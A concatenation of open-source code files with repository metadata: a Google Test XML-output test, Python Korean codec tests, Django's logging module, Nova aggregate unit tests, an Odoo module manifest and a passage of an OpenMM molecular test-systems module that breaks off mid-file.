<testcase name="AnotherTestThatHasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="AnotherTestThatHasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
</testsuite>
<testsuite name="TypedTest/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/0" />
</testsuite>
<testsuite name="TypedTest/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/1" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/0" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/1" />
</testsuite>
</testsuites>""" % {'stack': STACK_TRACE_TEMPLATE}
EXPECTED_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="0" failures="0" disabled="0" errors="0" time="*" name="AllTests">
</testsuites>"""
class GTestXMLOutputUnitTest(gtest_xml_test_utils.GTestXMLTestCase):
"""
Unit test for Google Test's XML output functionality.
"""
def testNonEmptyXmlOutput(self):
"""
Runs a test program that generates a non-empty XML output, and
tests that the XML output is expected.
"""
self._TestXmlOutput(GTEST_PROGRAM_NAME, EXPECTED_NON_EMPTY_XML, 1)
def testEmptyXmlOutput(self):
"""
Runs a test program that generates an empty XML output, and
tests that the XML output is expected.
"""
self._TestXmlOutput("gtest_no_test_unittest",
EXPECTED_EMPTY_XML, 0)
def testDefaultOutputFile(self):
"""
Confirms that Google Test produces an XML output file with the expected
default name if no name is explicitly specified.
"""
output_file = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_DEFAULT_OUTPUT_FILE)
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(
"gtest_no_test_unittest")
try:
os.remove(output_file)
except OSError, e:
if e.errno != errno.ENOENT:
raise
p = gtest_test_utils.Subprocess(
[gtest_prog_path, "%s=xml" % GTEST_OUTPUT_FLAG],
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
self.assert_(os.path.isfile(output_file))
def testSuppressedXmlOutput(self):
"""
Tests that no XML file is generated if the default XML listener is
shut down before RUN_ALL_TESTS is invoked.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_PROGRAM_NAME + "out.xml")
if os.path.isfile(xml_path):
os.remove(xml_path)
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(GTEST_PROGRAM_NAME)
command = [gtest_prog_path,
"%s=xml:%s" % (GTEST_OUTPUT_FLAG, xml_path),
"--shut_down_xml"]
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
self.assert_(False,
"%s was killed by signal %d" % (gtest_prog_name, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(1, p.exit_code,
"'%s' exited with code %s, which doesn't match "
"the expected exit code %s."
% (command, p.exit_code, 1))
self.assert_(not os.path.isfile(xml_path))
def _TestXmlOutput(self, gtest_prog_name, expected_xml, expected_exit_code):
"""
Asserts that the XML document generated by running the program
gtest_prog_name matches expected_xml, a string containing another
XML document. Furthermore, the program's exit code must be
expected_exit_code.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
gtest_prog_name + "out.xml")
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(gtest_prog_name)
command = [gtest_prog_path, "%s=xml:%s" % (GTEST_OUTPUT_FLAG, xml_path)]
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
self.assert_(False,
"%s was killed by signal %d" % (gtest_prog_name, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(expected_exit_code, p.exit_code,
"'%s' exited with code %s, which doesn't match "
"the expected exit code %s."
% (command, p.exit_code, expected_exit_code))
expected = minidom.parseString(expected_xml)
actual = minidom.parse(xml_path)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
actual .unlink()
if __name__ == '__main__':
os.environ['GTEST_STACK_TRACE_DEPTH'] = '1'
gtest_test_utils.Main()
|
bsd-3-clause
|
p4datasystems/CarnotKEdist
|
dist/Lib/test/test_codecencodings_kr.py
|
149
|
2750
|
#!/usr/bin/env python
#
# test_codecencodings_kr.py
# Codec encoding tests for ROK encodings.
#
from test import test_support
from test import test_multibytecodec_support
import unittest
class Test_CP949(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'cp949'
tstring = test_multibytecodec_support.load_teststring('cp949')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
)
class Test_EUCKR(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'euc_kr'
tstring = test_multibytecodec_support.load_teststring('euc_kr')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
# composed make-up sequence errors
("\xa4\xd4", "strict", None),
("\xa4\xd4\xa4", "strict", None),
("\xa4\xd4\xa4\xb6", "strict", None),
("\xa4\xd4\xa4\xb6\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4", "strict", u"\uc4d4"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4x", "strict", u"\uc4d4x"),
("a\xa4\xd4\xa4\xb6\xa4", "replace", u"a\ufffd"),
("\xa4\xd4\xa3\xb6\xa4\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa3\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa3\xd4", "strict", None),
("\xa4\xd4\xa4\xff\xa4\xd0\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xff\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xff", "replace", u"\ufffd"),
("\xc1\xc4", "strict", u"\uc894"),
)
class Test_JOHAB(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'johab'
tstring = test_multibytecodec_support.load_teststring('johab')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\ucd27"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\ucd27\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\ucd27"),
)
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
apache-2.0
|
rds0751/colinkers
|
env/Lib/site-packages/django/utils/log.py
|
85
|
6462
|
from __future__ import unicode_literals
import logging
import logging.config # needed when logging_config doesn't start with logging.config
from copy import copy
from django.conf import settings
from django.core import mail
from django.core.mail import get_connection
from django.core.management.color import color_style
from django.utils.module_loading import import_string
from django.views.debug import ExceptionReporter
# Default logging for Django. This sends an email to the site admins on every
# HTTP 500 error. Depending on DEBUG, all other log records are either sent to
# the console (DEBUG=True) or discarded (DEBUG=False) by means of the
# require_debug_true filter.
DEFAULT_LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'django.server': {
'()': 'django.utils.log.ServerFormatter',
'format': '[%(server_time)s] %(message)s',
}
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'django.server': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'django.server',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
},
'django.server': {
'handlers': ['django.server'],
'level': 'INFO',
'propagate': False,
},
}
}
def configure_logging(logging_config, logging_settings):
if logging_config:
# First find the logging configuration function ...
logging_config_func = import_string(logging_config)
logging.config.dictConfig(DEFAULT_LOGGING)
# ... then invoke it with the logging settings
if logging_settings:
logging_config_func(logging_settings)
class AdminEmailHandler(logging.Handler):
"""An exception log handler that emails log entries to site admins.
If the request is passed as the first argument to the log record,
request data will be provided in the email report.
"""
def __init__(self, include_html=False, email_backend=None):
logging.Handler.__init__(self)
self.include_html = include_html
self.email_backend = email_backend
def emit(self, record):
try:
request = record.request
subject = '%s (%s IP): %s' % (
record.levelname,
('internal' if request.META.get('REMOTE_ADDR') in settings.INTERNAL_IPS
else 'EXTERNAL'),
record.getMessage()
)
except Exception:
subject = '%s: %s' % (
record.levelname,
record.getMessage()
)
request = None
subject = self.format_subject(subject)
# Since we add a nicely formatted traceback on our own, create a copy
# of the log record without the exception data.
no_exc_record = copy(record)
no_exc_record.exc_info = None
no_exc_record.exc_text = None
if record.exc_info:
exc_info = record.exc_info
else:
exc_info = (None, record.getMessage(), None)
reporter = ExceptionReporter(request, is_email=True, *exc_info)
message = "%s\n\n%s" % (self.format(no_exc_record), reporter.get_traceback_text())
html_message = reporter.get_traceback_html() if self.include_html else None
self.send_mail(subject, message, fail_silently=True, html_message=html_message)
def send_mail(self, subject, message, *args, **kwargs):
mail.mail_admins(subject, message, *args, connection=self.connection(), **kwargs)
def connection(self):
return get_connection(backend=self.email_backend, fail_silently=True)
def format_subject(self, subject):
"""
Escape CR and LF characters.
"""
return subject.replace('\n', '\\n').replace('\r', '\\r')
class CallbackFilter(logging.Filter):
"""
A logging filter that checks the return value of a given callable (which
takes the record-to-be-logged as its only parameter) to decide whether to
log a record.
"""
def __init__(self, callback):
self.callback = callback
def filter(self, record):
if self.callback(record):
return 1
return 0
class RequireDebugFalse(logging.Filter):
def filter(self, record):
return not settings.DEBUG
class RequireDebugTrue(logging.Filter):
def filter(self, record):
return settings.DEBUG
class ServerFormatter(logging.Formatter):
def __init__(self, *args, **kwargs):
self.style = color_style()
super(ServerFormatter, self).__init__(*args, **kwargs)
def format(self, record):
msg = record.msg
status_code = getattr(record, 'status_code', None)
if status_code:
if 200 <= status_code < 300:
# Put 2XX first, since it should be the common case
msg = self.style.HTTP_SUCCESS(msg)
elif 100 <= status_code < 200:
msg = self.style.HTTP_INFO(msg)
elif status_code == 304:
msg = self.style.HTTP_NOT_MODIFIED(msg)
elif 300 <= status_code < 400:
msg = self.style.HTTP_REDIRECT(msg)
elif status_code == 404:
msg = self.style.HTTP_NOT_FOUND(msg)
elif 400 <= status_code < 500:
msg = self.style.HTTP_BAD_REQUEST(msg)
else:
# Any 5XX, or any other status code
msg = self.style.HTTP_SERVER_ERROR(msg)
if self.uses_server_time() and not hasattr(record, 'server_time'):
record.server_time = self.formatTime(record, self.datefmt)
record.msg = msg
return super(ServerFormatter, self).format(record)
def uses_server_time(self):
return self._fmt.find('%(server_time)') >= 0
|
agpl-3.0
|
eonpatapon/nova
|
nova/tests/unit/objects/test_aggregate.py
|
30
|
7793
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils import timeutils
from nova import db
from nova import exception
from nova.objects import aggregate
from nova.tests.unit import fake_notifier
from nova.tests.unit.objects import test_objects
NOW = timeutils.utcnow().replace(microsecond=0)
fake_aggregate = {
'created_at': NOW,
'updated_at': None,
'deleted_at': None,
'deleted': False,
'id': 123,
'name': 'fake-aggregate',
'hosts': ['foo', 'bar'],
'metadetails': {'this': 'that'},
}
SUBS = {'metadata': 'metadetails'}
class _TestAggregateObject(object):
def test_get_by_id(self):
self.mox.StubOutWithMock(db, 'aggregate_get')
db.aggregate_get(self.context, 123).AndReturn(fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate.get_by_id(self.context, 123)
self.compare_obj(agg, fake_aggregate, subs=SUBS)
def test_create(self):
self.mox.StubOutWithMock(db, 'aggregate_create')
db.aggregate_create(self.context, {'name': 'foo'},
metadata={'one': 'two'}).AndReturn(fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.name = 'foo'
agg.metadata = {'one': 'two'}
agg.create()
self.compare_obj(agg, fake_aggregate, subs=SUBS)
def test_recreate_fails(self):
self.mox.StubOutWithMock(db, 'aggregate_create')
db.aggregate_create(self.context, {'name': 'foo'},
metadata={'one': 'two'}).AndReturn(fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.name = 'foo'
agg.metadata = {'one': 'two'}
agg.create()
self.assertRaises(exception.ObjectActionError, agg.create,
self.context)
def test_save(self):
self.mox.StubOutWithMock(db, 'aggregate_update')
db.aggregate_update(self.context, 123, {'name': 'baz'}).AndReturn(
fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.id = 123
agg.name = 'baz'
agg.save()
self.compare_obj(agg, fake_aggregate, subs=SUBS)
def test_save_and_create_no_hosts(self):
agg = aggregate.Aggregate()
agg.id = 123
agg.hosts = ['foo', 'bar']
self.assertRaises(exception.ObjectActionError,
agg.create, self.context)
self.assertRaises(exception.ObjectActionError,
agg.save, self.context)
def test_update_metadata(self):
self.mox.StubOutWithMock(db, 'aggregate_metadata_delete')
self.mox.StubOutWithMock(db, 'aggregate_metadata_add')
db.aggregate_metadata_delete(self.context, 123, 'todelete')
db.aggregate_metadata_add(self.context, 123, {'toadd': 'myval'})
self.mox.ReplayAll()
fake_notifier.NOTIFICATIONS = []
agg = aggregate.Aggregate()
agg._context = self.context
agg.id = 123
agg.metadata = {'foo': 'bar'}
agg.obj_reset_changes()
agg.update_metadata({'todelete': None, 'toadd': 'myval'})
self.assertEqual(2, len(fake_notifier.NOTIFICATIONS))
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('aggregate.updatemetadata.start', msg.event_type)
self.assertEqual({'todelete': None, 'toadd': 'myval'},
msg.payload['meta_data'])
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual('aggregate.updatemetadata.end', msg.event_type)
self.assertEqual({'todelete': None, 'toadd': 'myval'},
msg.payload['meta_data'])
self.assertEqual({'foo': 'bar', 'toadd': 'myval'}, agg.metadata)
def test_destroy(self):
self.mox.StubOutWithMock(db, 'aggregate_delete')
db.aggregate_delete(self.context, 123)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.id = 123
agg.destroy()
def test_add_host(self):
self.mox.StubOutWithMock(db, 'aggregate_host_add')
db.aggregate_host_add(self.context, 123, 'bar'
).AndReturn({'host': 'bar'})
self.mox.ReplayAll()
agg = aggregate.Aggregate()
agg.id = 123
agg.hosts = ['foo']
agg._context = self.context
agg.add_host('bar')
self.assertEqual(agg.hosts, ['foo', 'bar'])
def test_delete_host(self):
self.mox.StubOutWithMock(db, 'aggregate_host_delete')
db.aggregate_host_delete(self.context, 123, 'foo')
self.mox.ReplayAll()
agg = aggregate.Aggregate()
agg.id = 123
agg.hosts = ['foo', 'bar']
agg._context = self.context
agg.delete_host('foo')
self.assertEqual(agg.hosts, ['bar'])
def test_availability_zone(self):
agg = aggregate.Aggregate()
agg.metadata = {'availability_zone': 'foo'}
self.assertEqual('foo', agg.availability_zone)
def test_get_all(self):
self.mox.StubOutWithMock(db, 'aggregate_get_all')
db.aggregate_get_all(self.context).AndReturn([fake_aggregate])
self.mox.ReplayAll()
aggs = aggregate.AggregateList.get_all(self.context)
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
def test_by_host(self):
self.mox.StubOutWithMock(db, 'aggregate_get_by_host')
db.aggregate_get_by_host(self.context, 'fake-host', key=None,
).AndReturn([fake_aggregate])
self.mox.ReplayAll()
aggs = aggregate.AggregateList.get_by_host(self.context, 'fake-host')
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
@mock.patch('nova.db.aggregate_get_by_metadata_key')
def test_get_by_metadata_key(self, get_by_metadata_key):
get_by_metadata_key.return_value = [fake_aggregate]
aggs = aggregate.AggregateList.get_by_metadata_key(
self.context, 'this')
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
@mock.patch('nova.db.aggregate_get_by_metadata_key')
def test_get_by_metadata_key_and_hosts_no_match(self, get_by_metadata_key):
get_by_metadata_key.return_value = [fake_aggregate]
aggs = aggregate.AggregateList.get_by_metadata_key(
self.context, 'this', hosts=['baz'])
self.assertEqual(0, len(aggs))
@mock.patch('nova.db.aggregate_get_by_metadata_key')
def test_get_by_metadata_key_and_hosts_match(self, get_by_metadata_key):
get_by_metadata_key.return_value = [fake_aggregate]
aggs = aggregate.AggregateList.get_by_metadata_key(
self.context, 'this', hosts=['foo', 'bar'])
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
class TestAggregateObject(test_objects._LocalTest,
_TestAggregateObject):
pass
class TestRemoteAggregateObject(test_objects._RemoteTest,
_TestAggregateObject):
pass
|
apache-2.0
|
fgesora/odoo
|
addons/sale_journal/__openerp__.py
|
262
|
2637
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Invoicing Journals',
'version': '1.0',
'category': 'Sales Management',
'description': """
The sales journal modules allows you to categorise your sales and deliveries (picking lists) between different journals.
========================================================================================================================
This module is very helpful for bigger companies that works by departments.
You can use journal for different purposes, some examples:
----------------------------------------------------------
* isolate sales of different departments
* journals for deliveries by truck or by UPS
Journals have a responsible and evolves between different status:
-----------------------------------------------------------------
* draft, open, cancel, done.
Batch operations can be processed on the different journals to confirm all sales
at once, to validate or invoice packing.
It also supports batch invoicing methods that can be configured by partners and sales orders, examples:
-------------------------------------------------------------------------------------------------------
* daily invoicing
* monthly invoicing
Some statistics by journals are provided.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/billing',
'depends': ['sale_stock'],
'data': [
'security/ir.model.access.csv',
'sale_journal_view.xml',
'sale_journal_data.xml'
],
'demo': ['sale_journal_demo.xml'],
'test': [ ],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
choderalab/YankTools
|
testsystems/systems.py
|
1
|
74487
|
#!/usr/local/bin/env python
"""
Module to generate Systems and positions for simple reference molecular systems for testing.
DESCRIPTION
This module provides functions for building a number of test systems of varying complexity,
useful for testing both OpenMM and various codes based on pyopenmm.
Note that the PYOPENMM_SOURCE_DIR must be set to point to where the PyOpenMM package is unpacked.
EXAMPLES
Create a 3D harmonic oscillator.
>>> import test_systems
>>> ho = test_systems.HarmonicOscillator()
>>> system, positions = ho.system, ho.positions
See list of methods for a complete list of provided test systems.
COPYRIGHT
@author Randall J. Radmer <[email protected]>
@author John D. Chodera <[email protected]>
All code in this repository is released under the GNU General Public License.
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
TODO
* Add units checking code to check arguments.
* Change default arguments to Quantity objects, rather than None?
"""
import os
import os.path
import sys
import numpy as np
import numpy.random
import math
import copy
import simtk
import simtk.openmm as mm
import simtk.unit as units
import simtk.openmm.app as app
kB = units.BOLTZMANN_CONSTANT_kB * units.AVOGADRO_CONSTANT_NA
#=============================================================================================
# Thermodynamic state description
#=============================================================================================
class ThermodynamicState(object):
"""
Data specifying a thermodynamic state obeying Boltzmann statistics.
EXAMPLES
Specify an NVT state for a water box at 298 K.
>>> import simtk.unit as u
>>> state = ThermodynamicState(temperature=298.0*u.kelvin)
Specify an NPT state at 298 K and 1 atm pressure.
>>> state = ThermodynamicState(temperature=298.0*u.kelvin, pressure=1.0*u.atmospheres)
Note that the pressure is only relevant for periodic systems.
"""
def __init__(self, temperature=None, pressure=None):
"""
Initialize the thermodynamic state.
OPTIONAL ARGUMENTS
system (simtk.openmm.System) - a System object describing the potential energy function for the system (default: None)
temperature (simtk.unit.Quantity compatible with 'kelvin') - the temperature for a system with constant temperature (default: None)
pressure (simtk.unit.Quantity compatible with 'atmospheres') - the pressure for constant-pressure systems (default: None)
mm (simtk.openmm API) - OpenMM API implementation to use
cache_context (boolean) - if True, will try to cache Context objects
"""
# Initialize.
self.temperature = temperature
self.pressure = pressure
return
#=============================================================================================
# Abstract base class for test systems
#=============================================================================================
class TestSystem(object):
"""Abstract base class for test systems, demonstrating how to implement a test system.
Parameters
----------
Attributes
----------
system : simtk.openmm.System
Openmm system with the harmonic oscillator
positions : list
positions of harmonic oscillator
Notes
-----
Unimplemented methods will default to the base class methods, which raise a NotImplementedException.
Examples
--------
Create a test system.
>>> testsystem = TestSystem()
Retrieve System object.
>>> system = testsystem.system
Retrieve the positions.
>>> positions = testsystem.positions
Serialize system and positions to XML (to aid in debugging).
>>> (system_xml, positions_xml) = testsystem.serialize()
"""
def __init__(self, temperature=None, pressure=None):
"""Abstract base class for test system.
Parameters
----------
temperature : simtk.unit.Quantity, optional, units compatible with simtk.unit.kelvin
The temperature of the system.
pressure : simtk.unit.Quantity, optional, units compatible with simtk.unit.atmospheres
The pressure of the system.
"""
# Create an empty system object.
self._system = mm.System()
# Store positions.
self._positions = units.Quantity(np.zeros([0,3], np.float), units.nanometers)
# Store thermodynamic parameters.
self._temperature = temperature
self._pressure = pressure
return
@property
def system(self):
"""The simtk.openmm.System object corresponding to the test system."""
return copy.deepcopy(self._system)
@system.setter
def system(self, value):
self._system = value
@system.deleter
def system(self):
del self._system
@property
def positions(self):
"""The simtk.unit.Quantity object containing the particle positions, with units compatible with simtk.unit.nanometers."""
return copy.deepcopy(self._positions)
@positions.setter
def positions(self, value):
self._positions = value
@positions.deleter
def positions(self):
del self._positions
@property
def analytical_properties(self):
"""A list of available analytical properties, accessible via 'get_propertyname(thermodynamic_state)' calls."""
return [ method[4:] for method in dir(self) if (method[0:4]=='get_') ]
def serialize(self):
"""Return the System and positions in serialized XML form.
Returns
-------
system_xml : str
Serialized XML form of System object.
state_xml : str
Serialized XML form of State object containing particle positions.
"""
from simtk.openmm import XmlSerializer
# Serialize System.
system_xml = XmlSerializer.serialize(self._system)
# Serialize positions via State.
if self._system.getNumParticles() == 0:
# Cannot serialize the State of a system with no particles.
state_xml = None
else:
platform = mm.Platform.getPlatformByName('Reference')
integrator = mm.VerletIntegrator(1.0 * units.femtoseconds)
context = mm.Context(self._system, integrator, platform)
context.setPositions(self._positions)
state = context.getState(getPositions=True)
del context, integrator
state_xml = XmlSerializer.serialize(state)
return (system_xml, state_xml)
@property
def name(self):
"""The name of the test system."""
return self.__class__.__name__
#=============================================================================================
# 3D harmonic oscillator
#=============================================================================================
class HarmonicOscillator(TestSystem):
"""Create a 3D harmonic oscillator, with a single particle confined in an isotropic harmonic well.
Parameters
----------
K : simtk.unit.Quantity, optional, default=100.0 * units.kilocalories_per_mole/units.angstrom**2
harmonic restraining potential
mass : simtk.unit.Quantity, optional, default=39.948 * units.amu
particle mass
Attributes
----------
system : simtk.openmm.System
Openmm system with the harmonic oscillator
positions : list
positions of harmonic oscillator
Notes
-----
The natural period of a harmonic oscillator is T = sqrt(m/K), so you will want to use an
integration timestep smaller than ~ T/10.
The standard deviation in position in each dimension is sigma = (kT / K)^(1/2)
The expectation and standard deviation of the potential energy of a 3D harmonic oscillator is (3/2)kT.
Examples
--------
Create a 3D harmonic oscillator with default parameters:
>>> ho = HarmonicOscillator()
>>> (system, positions) = ho.system, ho.positions
Create a harmonic oscillator with specified mass and spring constant:
>>> mass = 12.0 * units.amu
>>> K = 1.0 * units.kilocalories_per_mole / units.angstroms**2
>>> ho = HarmonicOscillator(K=K, mass=mass)
>>> (system, positions) = ho.system, ho.positions
Get a list of the available analytically-computed properties.
>>> print ho.analytical_properties
['potential_expectation', 'potential_standard_deviation']
Compute the potential expectation and standard deviation
>>> import simtk.unit as u
>>> thermodynamic_state = ThermodynamicState(temperature=298.0*u.kelvin)
>>> potential_mean = ho.get_potential_expectation(thermodynamic_state)
>>> potential_stddev = ho.get_potential_standard_deviation(thermodynamic_state)
"""
def __init__(self, K=100.0 * units.kilocalories_per_mole / units.angstroms**2, mass=39.948 * units.amu, **kwargs):
TestSystem.__init__(self, kwargs)
# Create an empty system object.
system = mm.System()
# Add the particle to the system.
system.addParticle(mass)
# Set the positions.
positions = units.Quantity(np.zeros([1,3], np.float32), units.angstroms)
# Add a restrining potential centered at the origin.
force = mm.CustomExternalForce('(K/2.0) * (x^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
force.addParticle(0, [])
system.addForce(force)
self.K, self.mass = K, mass
self.system, self.positions = system, positions
# Number of degrees of freedom.
self.ndof = 3
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return (3./2.) * kB * state.temperature
def get_potential_standard_deviation(self, state):
"""Return the standard deviation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
potential energy standard deviation if implemented, or else None
"""
return (3./2.) * kB * state.temperature
#=============================================================================================
# Diatomi molecule
#=============================================================================================
class Diatom(TestSystem):
"""Create a free diatomic molecule with a single harmonic bond between the two atoms.
Parameters
----------
K : simtk.unit.Quantity, optional, default=290.1 * units.kilocalories_per_mole / units.angstrom**2
harmonic bond potential. default is GAFF c-c bond
r0 : simtk.unit.Quantity, optional, default=1.550 * units.amu
bond length. Default is Amber GAFF c-c bond.
constraint : bool, default=False
if True, the bond length will be constrained
m1 : simtk.unit.Quantity, optional, default=12.01 * units.amu
particle1 mass
m2 : simtk.unit.Quantity, optional, default=12.01 * units.amu
particle2 mass
use_central_potential : bool, optional, default=False
if True, a soft central potential will also be added to keep the system from drifting away
Notes
-----
The natural period of a harmonic oscillator is T = sqrt(m/K), so you will want to use an
integration timestep smaller than ~ T/10.
Examples
--------
Create a Diatom:
>>> diatom = Diatom()
>>> system, positions = diatom.system, diatom.positions
"""
def __init__(self,
K=290.1 * units.kilocalories_per_mole / units.angstrom**2,
r0=1.550 * units.angstroms,
m1=39.948 * units.amu,
m2=39.948 * units.amu,
constraint=False,
use_central_potential=False):
# Create an empty system object.
system = mm.System()
# Add two particles to the system.
system.addParticle(m1)
system.addParticle(m2)
# Add a harmonic bond.
force = mm.HarmonicBondForce()
force.addBond(0, 1, r0, K)
system.addForce(force)
if constraint:
# Add constraint between particles.
system.addConstraint(0, 1, r0)
# Set the positions.
positions = units.Quantity(np.zeros([2,3], np.float32), units.angstroms)
positions[1,0] = r0
if use_central_potential:
# Add a central restraining potential.
Kcentral = 1.0 * units.kilocalories_per_mole / units.nanometer**2
force = mm.CustomExternalForce('(Kcentral/2.0) * (x^2 + y^2 + z^2)')
force.addGlobalParameter('K', Kcentral)
force.addParticle(0, [])
force.addParticle(1, [])
system.addForce(force)
self.system, self.positions = system, positions
self.K, self.r0, self.m1, self.m2, self.constraint, self.use_central_potential = K, r0, m1, m2, constraint, use_central_potential
# Store number of degrees of freedom.
self.ndof = 6 - 1*constraint
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return (self.ndof/2.) * kB * state.temperature
#=============================================================================================
# Constraint-coupled harmonic oscillator
#=============================================================================================
class ConstraintCoupledHarmonicOscillator(TestSystem):
